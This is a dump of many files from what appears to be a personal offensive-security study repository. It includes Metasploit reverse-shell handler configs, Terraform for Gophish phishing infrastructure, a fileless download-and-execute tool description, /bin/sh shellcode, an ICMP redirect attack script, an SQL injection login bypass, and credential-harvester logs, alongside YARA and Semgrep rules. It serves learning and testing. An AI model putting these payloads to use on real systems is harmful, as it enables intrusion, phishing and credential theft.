"aws_internet_gateway" "igw" { 2 | vpc_id = "${aws_vpc.gophish_vpc.id}" 3 | tags = { 4 | Name = "gophish-igw" 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Defense/Forensics/Python/README.md: -------------------------------------------------------------------------------- 1 | # Python Forensics 2 | 3 | This directory contains Python scripts that may be useful to your digital 4 | forensics investigation 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/windows_x64_shell_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload windows/x64/shell_reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /Misc/PortScanner/portScanner_manjaro_screen_capture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/PortScanner/portScanner_manjaro_screen_capture.png -------------------------------------------------------------------------------- /OffensiveGo/README.md: -------------------------------------------------------------------------------- 1 | # HackingWithGolang 2 | 3 | This directory contains code written while reading "**Black Hat Go**" by Tom Steele, Chris Patten, and Dan Kottmann. 4 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/README.md: -------------------------------------------------------------------------------- 1 | # PortSwigger Web Security Academy 2 | 3 | This folder will be dedicated to solutions for labs found in PortSwigger's Web Security Academy. 4 | -------------------------------------------------------------------------------- /MetasploitRCFiles/linux_x64_meterpreter_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload linux/x64/meterpreter/reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/linux_x86_meterpreter_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload linux/x86/meterpreter/reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/windows_x86_meterpreter_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload windows/meterpreter/reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/notesearch_env_exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/notesearch_env_exploit -------------------------------------------------------------------------------- /MetasploitRCFiles/windows_x64_meterpreter_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload windows/x64/meterpreter/reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/sample.txt.encrypted: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/sample.txt.encrypted -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/MemorySegmentation/stack_ex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/MemorySegmentation/stack_ex -------------------------------------------------------------------------------- /APIProjects/GitHub/README.md: -------------------------------------------------------------------------------- 1 | ### Creating a GitHub Personal Access Token 2 | https://docs.github.com/en/free-pro-team@latest/github/authenticating-to-github/creating-a-personal-access-token 3 | -------------------------------------------------------------------------------- /Cryptography/README.md: -------------------------------------------------------------------------------- 1 | # Cryptography 2 | Deep dive into Cryptography with Python3 and little bit of C# 3 | 4 | "Practical Crytography in Python: Learning Correct Crytography by Example" 5 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Files/uid.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() 4 | { 5 | printf("uid: %d\n", getuid()); 6 | printf("Effective uid: %d\n", geteuid()); 7 | } 8 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/README.md: -------------------------------------------------------------------------------- 1 | # Server Side Attacks 2 | 3 | This directory contains all of the server side attack paths found in the PortSwigger Web Security Academy labs. 4 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.3.java.solution.txt: -------------------------------------------------------------------------------- 1 | You guessed it, its XXE! No validation of the XML document being parsed - no external entites protections, no DTDs protections, etc 2 | -------------------------------------------------------------------------------- /APIProjects/Twitter/CyberCrawler/api.json: -------------------------------------------------------------------------------- 1 | { 2 | "consumer_key": "None", 3 | "consumer_secret": "None", 4 | "access_token_key": "None", 5 | "access_token_secret": "None" 6 | } 7 | -------------------------------------------------------------------------------- /MyTools/RedTeam/massbuster/config.json: -------------------------------------------------------------------------------- 1 | { 2 | "gobuster": "--follow-redirect --status-codes-blacklist 404 -q --no-error --random-agent", 3 | "httpx": "-silent -random-agent -no-color" 4 | } 5 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/README.md: -------------------------------------------------------------------------------- 1 | # Client Side Attacks 2 | 3 | iThis directory contains all of the client side attack paths found in the PortSwigger Web Security Academy labs. 4 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/MemorySegmentation/memory_segments: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/MemorySegmentation/memory_segments -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/MemorySegmentation/using_the_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/MemorySegmentation/using_the_heap -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/utils/prog_args.py: -------------------------------------------------------------------------------- 1 | from argparse import ArgumentParser 2 | 3 | def prog_args(): 4 | parser = ArgumentParser() 5 | 6 | return parser.parse_args() 7 | 8 | -------------------------------------------------------------------------------- /Misc/DFIR-Tools/README.md: -------------------------------------------------------------------------------- 1 | # Response-Tools 2 | Digital Forensics and Incident response tools 3 | 4 | ### Installed Python Dependencies 5 | 6 | ``` 7 | python3 -m pip install -r requirements.txt 8 | ``` 9 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/public/Flaticon.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/public/Flaticon.eot -------------------------------------------------------------------------------- /OffensiveGo/ShellcodeExecution/ViaSyscall/go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.1.0 h1:kunALQeHf1/185U1i0GOB/fy1IPRDDpuoOOqRReG57U= 2 | golang.org/x/sys v0.1.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 3 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow2 -------------------------------------------------------------------------------- /Misc/fix-ssh-key.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | SSH_FILE=$1 3 | sed -e "s/-----BEGIN OPENSSH PRIVATE KEY-----/&\n/"\ 4 | -e "s/-----END OPENSSH PRIVATE KEY-----/\n&/"\ 5 | -e "s/\S\{64\}/&\n/g"\ 6 | $SSH_FILE 7 | -------------------------------------------------------------------------------- /Phishing/Gophish/associations.tf: -------------------------------------------------------------------------------- 1 | resource "aws_route_table_association" "rt_associations" { 2 | subnet_id = "${aws_subnet.public_subnet.id}" 3 | route_table_id = "${aws_route_table.public_rtb.id}" 4 | } 5 | -------------------------------------------------------------------------------- /DockerStuff/MalwareAnalysis/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.9' 2 | services: 3 | cyberchef: 4 | build: 5 | context: ./ 6 | dockerfile: cyberchef.dockerfile 7 | ports: 8 | - "7373:8000" 9 | -------------------------------------------------------------------------------- /OffensiveGo/DNS/DNSExfiltration/go.mod: -------------------------------------------------------------------------------- 1 | module dns_exfiltration 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/alexflint/go-arg v1.4.3 // indirect 7 | github.com/alexflint/go-scalar v1.1.0 // indirect 8 | ) 9 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.dll -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.exe -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.pdb -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.dll -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.exe -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.pdb -------------------------------------------------------------------------------- /Phishing/Gophish/vpc.tf: -------------------------------------------------------------------------------- 1 | resource "aws_vpc" "gophish_vpc" { 2 | cidr_block = "${var.vpc_cidr}" 3 | enable_dns_support = true 4 | enable_dns_hostnames = true 5 | tags = { 6 | Name = "gophish-vpc" 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/get_env.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char *argv[]) 5 | { 6 | printf("%s is at %p\n", argv[1], getenv(argv[1])); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /MyTools/RedTeam/wgetexec/README.md: -------------------------------------------------------------------------------- 1 | # wgetexec 2 | 3 | Downloads a Bash or PowerShell script hosted at a URL and executes it without writing to disk. 4 | 5 | ### Usage 6 | ``` 7 | wgetexec -url [URL] 8 | ``` 9 | 10 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/README.md: -------------------------------------------------------------------------------- 1 | # Pyphish 2 | 3 | A command-line tool using the Gophish API to create large scale phishing campaigns. 4 | 5 | # For using on Kali 6 | 7 | ```bash 8 | sudo apt install mailutils 9 | ``` 10 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.4.py: -------------------------------------------------------------------------------- 1 | @app.route('/internal-dashboard/users', methods=['GET']) 2 | def showUsers(): 3 | users = db.getAllUsers() 4 | return render_template("dashboard/users.html", users=users) 5 | 6 | -------------------------------------------------------------------------------- /SecureCodeReview/semgrep/example-rule2.yml: -------------------------------------------------------------------------------- 1 | id: python-no-prints-in-prod 2 | pattern: oldp($X) 3 | message: Use logging.debug() instead of old_print() 4 | severity: INFO 5 | fix: logging.debug($X) 6 | languages: 7 | - python 8 | -------------------------------------------------------------------------------- /Cryptography/MsgIntegritySignaturesCertificates/hmac.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.ciphers import hashes, hmac 2 | from cryptography.hazmat.backends import default_backend 3 | 4 | 5 | if __name__ == "__main__": 6 | pass 7 | -------------------------------------------------------------------------------- /Phishing/Gophish/routes.tf: -------------------------------------------------------------------------------- 1 | resource "aws_route_table" "public_rtb" { 2 | vpc_id = "${aws_vpc.gophish_vpc.id}" 3 | route { 4 | cidr_block = "0.0.0.0/0" 5 | gateway_id = "${aws_internet_gateway.igw.id}" 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /PhysicalPentestStuff/rubberDucky/scripts/README.md: -------------------------------------------------------------------------------- 1 | # Rubber-Ducky-Scripts 2 | This repo is dedicated to rubber ducky scripts, both malicious and benevolent. 3 | ### Compile Script 4 | `java -jar duckencoder.jar -i [name_of_payload]` 5 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.assets.cache -------------------------------------------------------------------------------- /Misc/BashCyOps/OS/detect-os.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | if type -t move &>/dev/null 3 | then 4 | printf "Windows\n" 5 | elif type -t scutil &>/dev/null 6 | then 7 | printf "MAC OS\n" 8 | else 9 | printf "Linux\n" 10 | fi 11 | -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/logging.php: -------------------------------------------------------------------------------- 1 | filename, $this->username, FILE_APPEND); 8 | } 9 | } 10 | 11 | ?> 12 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/public/public_files/roundcube_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/public/public_files/roundcube_logo.png -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/utils/db.py: -------------------------------------------------------------------------------- 1 | from tinydb import TinyDB 2 | 3 | 4 | # TODO: create a class from handling emails and stuff 5 | # from a tinydb database, and dont forget to add a 6 | # command and add it to the autocompletion word list 7 | -------------------------------------------------------------------------------- /Phishing/Gophish/key_pair.tf: -------------------------------------------------------------------------------- 1 | # NOTE: run the command: `ssh-keygen -f id_rsa` to generate private and public SSH keys 2 | resource "aws_key_pair" "gophish_ssh_key" { 3 | key_name = "gophish-ssh-key" 4 | public_key = "${file("id_rsa.pub")}" 5 | } 6 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/CSharpAES.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /SecureCodeReview/semgrep/example-rule1.yml: -------------------------------------------------------------------------------- 1 | rules: 2 | - id: is-comparison 3 | languages: 4 | - python 5 | message: The operator 'is' is for reference equality, not value equality! Use 6 | `==` instead! 7 | pattern: $SOMEVAR is "..." 8 | severity: ERROR 9 | -------------------------------------------------------------------------------- /C2Routing/caddy/webdav_server/Caddyfile: -------------------------------------------------------------------------------- 1 | # Caddy webdav server basic example 2 | { 3 | admin off 4 | } 5 | 6 | :8000 { 7 | route { 8 | rewrite /dav /dav/ 9 | webdav /dav/* { 10 | prefix /dav 11 | } 12 | } 13 | file_server browse 14 | } 15 | -------------------------------------------------------------------------------- /SecureCodeReview/semgrep/README.md: -------------------------------------------------------------------------------- 1 | # Semgrep: Static Code Analysis 2 | 3 | ### Installation 4 | 5 | ```console 6 | brew install semgrep 7 | python3 -m pip install semgrep 8 | docker run --rm -v "${PWD}:/src" returntocorp/semgrep semgrep --config=auto 9 | ``` 10 | 11 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Netflix/creds.txt: -------------------------------------------------------------------------------- 1 | Time: 2021-01-13 13:42:55.072118839 -0500 EST m=+106.591806301, Username: admin, Password: admin 2 | Time: 2021-01-13 13:44:15.821515227 -0500 EST m=+187.341202699, Username: johnwick@continental.com, Password: babayaga 3 | -------------------------------------------------------------------------------- /PyViruses/PyBackdoorInjection/README.md: -------------------------------------------------------------------------------- 1 | # Malware written in Python 2 | 3 | **DISCLAIMER**: The scripts in this directory have not been created with malicious intent but instead for educational purposes. Please do not use any of these scripts to harm someone else's computer system. 4 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/bin/Debug/netcoreapp3.1/CSharpAES.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\rodri\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\rodri\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/IfsAndPathSystemFunctionAbuse.c: -------------------------------------------------------------------------------- 1 | #include 2 | // providing the absolute path to `system` function can still 3 | // be abused by altering both the PATH and IFS environment 4 | // variables 5 | int main() { 6 | system("/usr/bin/cal"); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /Phishing/Gophish/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_version = "~> 1.0.5" 3 | required_providers { 4 | aws = { 5 | source = "hashicorp/aws" 6 | version = ">= 3.60" 7 | } 8 | } 9 | } 10 | 11 | provider "aws" { 12 | region = "us-east-1" 13 | profile = "gophish" 14 | } 15 | -------------------------------------------------------------------------------- /OffensiveGo/SliverStager/go.mod: -------------------------------------------------------------------------------- 1 | module sliver_stager 2 | 3 | go 1.17 4 | 5 | require github.com/Binject/go-donut v0.0.0-20210701074227-67a31e2d883e 6 | 7 | require ( 8 | github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf // indirect 9 | github.com/google/uuid v1.2.0 // indirect 10 | ) 11 | -------------------------------------------------------------------------------- /SLAE/compile.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo '[+] Assemblying file with Nasm...' 4 | nasm -f elf32 -o $1.o $1.nasm 5 | echo '[+] Successfuly assembled file...' 6 | 7 | echo '[+] Beginning the linking process...' 8 | ld -m elf_i386 -o $1 $1.o 9 | echo '[+] Successfully linked all file references...' 10 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/.NETCoreApp,Version=v3.1.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETCoreApp,Version=v3.1", FrameworkDisplayName = "")] 5 | -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/PathSystemFunctionAbuse.c: -------------------------------------------------------------------------------- 1 | #include 2 | // overwriting the PATH variable will allow the attacker to perform 3 | // search order hijacking attack and replace the "cal" program that 4 | // would normally run 5 | int main() { 6 | system("cal"); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /NucleiTemplates/nuclei.yaml.tmpl: -------------------------------------------------------------------------------- 1 | id: 2 | 3 | info: 4 | name: 5 | author: bin3xish477 6 | severity: 7 | description: 8 | reference: 9 | - "" 10 | 11 | requests: 12 | - method: GET 13 | path: "{{BaseURL}}" 14 | matchers: 15 | - type: 16 | extractors: 17 | - type: 18 | -------------------------------------------------------------------------------- /OffensiveGo/ProcessInjection/SliverStager/color.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | const ( 4 | red = "\u001b[31m" 5 | green = "\u001b[32m" 6 | blue = "\u001b[34m" 7 | yellow = "\u001b[33m" 8 | purple = "\u001b[35m" 9 | end = "\u001b[0m" 10 | bold = "\u001b[1m" 11 | underL = "\u001b[4m" 12 | ) 13 | -------------------------------------------------------------------------------- /Phishing/Gophish/subnets.tf: -------------------------------------------------------------------------------- 1 | resource "aws_subnet" "public_subnet" { 2 | vpc_id = "${aws_vpc.gophish_vpc.id}" 3 | cidr_block = "${var.public_subnet_cidr}" 4 | map_public_ip_on_launch = true 5 | availability_zone = "${var.az}" 6 | tags = { 7 | Name = "public-subnet-67354a08" 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt update && \ 4 | apt -y upgrade && \ 5 | apt install -y python3 && \ 6 | apt install -y python3-pip 7 | 8 | RUN mkdir -p /opt/Pyphish 9 | 10 | COPY . /opt/Pyphish/ 11 | 12 | RUN pip3 install -r /opt/Pyphish/requirements.txt 13 | 14 | -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/AbusingLdPreload.c: -------------------------------------------------------------------------------- 1 | #include 2 | // altering the LD_PRELOAD environment variable will 3 | // allow an attacker to change the libraries loaded 4 | // by a program using external libraries 5 | int main() { 6 | printf("Hello World!"); 7 | sleep(2); 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /Phishing/Gophish/outputs.tf: -------------------------------------------------------------------------------- 1 | output "instance_id" { 2 | description = "ID of the EC2 instance" 3 | value = aws_instance.gophish_instance.id 4 | } 5 | 6 | output "instance_public_ip" { 7 | description = "Public IP address of the EC2 instance" 8 | value = aws_instance.gophish_instance.public_ip 9 | } 10 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab2/README.md: -------------------------------------------------------------------------------- 1 | # Subverting Application Logic 2 | 3 | ### Objective 4 | 5 | - Bypass the login functionality using SQL Injection 6 | - Login as the **Administrator** user 7 | 8 | ### Solution 9 | 10 | ``` 11 | username: Administrator' -- - 12 | password: pass 13 | ``` 14 | -------------------------------------------------------------------------------- /Burp/CustomActions/SendUnauthenticatedRequest.java: -------------------------------------------------------------------------------- 1 | var unauthedReq = requestResponse.request().withRemovedHeader("Authorization").withRemovedHeader("Cookie"); 2 | var statusCode = api().http().sendRequest(unauthedReq).response().statusCode(); 3 | logging().logToOutput(String.format("Unauthenticated Request Status Code: %s", statusCode)); 4 | -------------------------------------------------------------------------------- /MicrosoftAttacks/MSHTA/payload.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /Misc/RaceConditions/check_success.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | CHECK_FILE="ls -l /etc/passwd" 4 | OLD=$($CHECK_FILE) 5 | NEW=$($CHECK_FILE) 6 | 7 | while [[ "$OLD" == "$NEW" ]] 8 | do 9 | ./vulnerableRaceConditionProgram.c < passwd_input 10 | NEW=$($CHECK_FILE) 11 | done 12 | 13 | echo "/etc/passwd file has been altared!" 14 | -------------------------------------------------------------------------------- /Misc/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | const char code[] = 4 | "\x31\xc0\x50\x68//sh\x68/bin" 5 | "\x89\xe3\x50\x53\x89\xe1\x99" 6 | "\xb0\x0b\xcd\x80"; 7 | 8 | int 9 | main(int args, char **argv) 10 | { 11 | char buffer[sizeof(code)]; 12 | strcpy(buffer, code); 13 | ((void(*)())buffer)(); 14 | } 15 | -------------------------------------------------------------------------------- /OffensiveGo/ProcessInjection/SliverStager/go.mod: -------------------------------------------------------------------------------- 1 | module proc-injection 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/alexflint/go-arg v1.4.3 // indirect 7 | github.com/alexflint/go-scalar v1.1.0 // indirect 8 | github.com/mitchellh/go-ps v1.0.0 // indirect 9 | golang.org/x/sys v0.0.0-20220227234510-4e6760a101f9 // indirect 10 | ) 11 | -------------------------------------------------------------------------------- /Misc/BufferOverflow/VulnServer/ex.py: -------------------------------------------------------------------------------- 1 | from socket import socket 2 | from subprocess import run, PIPE 3 | 4 | pattern_size=100 5 | 6 | msf_pattern=run( 7 | ['msf-pattern_create', '-l', str(pattern_size)], 8 | stdout=PIPE, stderr=PIPE 9 | ) 10 | 11 | msf_pattern=str(msf_pattern.stdout)[2:-1].rstrip("\\n") 12 | 13 | print(msf_pattern) 14 | -------------------------------------------------------------------------------- /Cryptography/AsymmetricEncryption/get_rsa_prime_numbers.py: -------------------------------------------------------------------------------- 1 | from rsa import RSA 2 | 3 | if __name__ == "__main__": 4 | manager = RSA(public_exponent=65537, key_size=2048) 5 | print(f"n = {manager.public_key.public_numbers().n}") 6 | print(f"e = {manager.public_key.public_numbers().e}") 7 | print(f"d = {manager.private_key.private_numbers().d}") 8 | -------------------------------------------------------------------------------- /MicrosoftAttacks/MSBuild/TaskTemplate.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using Microsoft.Build.Framework; 4 | using Microsoft.Build.Utilities; 5 | 6 | namespace MyTasks 7 | { 8 | public class EvilTask : Task 9 | { 10 | public override bool Execute() 11 | { 12 | Process.Start("calc.exe"); 13 | } 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /Misc/YARA/DetectExeWithIP.yar: -------------------------------------------------------------------------------- 1 | rule DetectExe 2 | { 3 | meta: 4 | description = "This Yara rule simply detects an exe file using 'magic byte' identification" 5 | author = "Alexis Rodriguez" 6 | date = "2020-10-12" 7 | 8 | strings: 9 | $exe_magic_bytes = {4D 5A} 10 | 11 | condition: 12 | $exe_magic_bytes at 0 13 | } 14 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/switch-case.zeek: -------------------------------------------------------------------------------- 1 | event zeek_init() 2 | { 3 | local str: string = "write a switch to count vowels!"; 4 | local cnt: count = 0; 5 | 6 | for (c in str) 7 | { 8 | switch (c) 9 | { 10 | case "a", "e", "i", "o", "u": 11 | cnt += 1; 12 | break; 13 | } 14 | } 15 | print fmt("Number of vowels: %s", cnt); 16 | } 17 | -------------------------------------------------------------------------------- /MicrosoftAttacks/CSharp/powershell.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Management.Automation; 3 | namespace Powershell 4 | { 5 | class Program 6 | { 7 | static void Main(string[] args) 8 | { 9 | PowerShell ps = PowerShell.Create(); 10 | ps.AddCommand("Invoke-Expression"); 11 | ps.AddArgument(""); 12 | ps.Invoke(); 13 | } 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.2.java.solution.txt: -------------------------------------------------------------------------------- 1 | This one is hard because one must be familiar with Java programming to quickly identify the vulnerability. The vulnerability lies in the use of the `Java.Util.Random` class instead of `Java.Util.SecureRandom` class. The sessions generated by the Random class are weak and allow an attacker to predict future sessions IDs. 2 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/CSharpAES.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/MemorySegmentation/stack_ex.c: -------------------------------------------------------------------------------- 1 | void test_func(int a, int b, int c, int d) 2 | { 3 | int flag; 4 | char buffer[0]; 5 | 6 | flag=31337; 7 | buffer[0]='A'; 8 | } 9 | 10 | int main() { 11 | test_func(1,2,3,4); 12 | } 13 | 14 | /* 15 | Compile with: 16 | gcc -g -o stack_ex stack_ex.c 17 | 18 | for gdb debugger 19 | */ 20 | -------------------------------------------------------------------------------- /Misc/ReturnToLibc/find_bin_bash.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() 5 | { 6 | // export MYSELL="/bin/bash" 7 | char *shell = (char *)getenv("MYSHELL"); 8 | 9 | if (shell) 10 | { 11 | printf("\tValue:\t%s\n", shell); 12 | printf("\tAddress: %x\n", (unsigned int)shell); 13 | } 14 | 15 | return 1; 16 | } 17 | -------------------------------------------------------------------------------- /Misc/icmp_redirect_attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from scapy.all import * 4 | 5 | ip = IP(src="192.168.33.30", dst="192.168.33.60") 6 | # type 5 = redirect 7 | icmp = ICMP(type=5, code=1) 8 | # setting gateway to malicous ip acting as routing 9 | icmp.gw = "192.168.33.138" 10 | 11 | ip2 = IP(src="192.168.33.60", dst="8.8.8.8") 12 | pkt = ip/icmp/ip2/UDP() 13 | send(pkt) -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/creds.txt: -------------------------------------------------------------------------------- 1 | Time: 2021-01-09 17:12:19.102679801 -0500 EST m=+11.580395960, Username: admin, Password: admin 2 | Time: 2021-01-09 